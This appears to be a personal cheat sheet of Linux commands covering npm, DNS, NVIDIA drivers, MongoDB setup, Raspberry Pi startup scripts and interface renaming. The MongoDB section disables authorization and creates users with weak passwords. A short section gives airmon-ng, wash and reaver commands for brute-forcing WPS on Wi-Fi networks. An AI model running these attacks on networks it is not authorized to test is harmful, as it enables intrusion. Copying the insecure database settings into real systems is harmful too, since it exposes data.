Update npm on Linux
[sudo] npm install npm@latest -g
[sudo] npm install npm@latest -g
sudo nano /etc/resolv.conf
nameserver 8.8.8.8 nameserver 8.8.4.4
zypper install -t pattern devel_C_C++ devel_kernel
sh /home/user/NVIDIA.run
Blacklist nouveau
echo "blacklist nouveau" >> /etc/modprobe.d/50-blacklist.conf && mkinitrd && reboot
Delete Nvidia
delete this file :
/etc/modprobe.d/nvidia-installer-disable-nouveau.conf
after install run
sudo nano /etc/mongodb.conf
disable security # Security settings. #security: # authorization: enabled
the restart service and run with config
mongod --config /etc/mongodb.conf
other commands
db.createUser( { user: "admin", pwd: "admin", roles: [ { role: "root", db: "admin" } ] } );
db.createUser( { user: "mahmood", pwd: "12345", roles: ["readWrite"] } );
References
https://docs.mongodb.com/v3.0/reference/configuration-options/
http://stackoverflow.com/questions/23943651/mongodb-admin-user-not-authorized
http://stackoverflow.com/questions/35881662/mongodb-error-not-authorized-to-execute-command
https://docs.mongodb.com/manual/tutorial/enable-authentication/
http://stackoverflow.com/questions/23003391/how-do-i-add-an-admin-user-to-mongo-in-2-6
./autogen.sh
./configure
make
make install
References
https://github.com/eribertomota/axel
https://github.com/eribertomota/axel/blob/master/INSTALL
apt-get update apt-get dist-upgrade apt-get install -y linux-headers-$(uname -r) apt-get install nvidia-kernel-dkms
References :
http://docs.kali.org/general-use/install-nvidia-drivers-on-kali-linux
gsettings set org.freedesktop.Tracker.Miner.Files crawling-interval -2 gsettings set org.freedesktop.Tracker.Miner.Files enable-monitors false
After this changes, it is highly recommended to cleanup the database to reclaim some lost space on the disk:
tracker-control -r
References :
http://askubuntu.com/questions/346211/tracker-store-and-tracker-miner-fs-eating-up-my-cpu-on-every-startup
sudo nano /etc/rc.local
python /home/pi/myscript.py &
References :
https://www.raspberrypi.org/documentation/linux/usage/rc-local.md
Finding a Network :
airmon-ng start [network interface name] airmon-ng start wlan0
show networks that are vulnerable to the WPS brute force attack Reaver uses :
wash -i [monitor interface name] wash -i mon0
Launching Reaver :
reaver -i mon0 -c [channel number] -b [bssid] -vv reaver -i mon0 -c 6 -b 00:23:69:48:33:95 -vv
References :
https://www.pwnieexpress.com/wps-cracking-with-reaver/
ifconfig peth0 down ip link set peth0 name eth0 ifconfig eth0 up
References :
http://kernelpanik.net/rename-a-linux-network-interface-without-udev/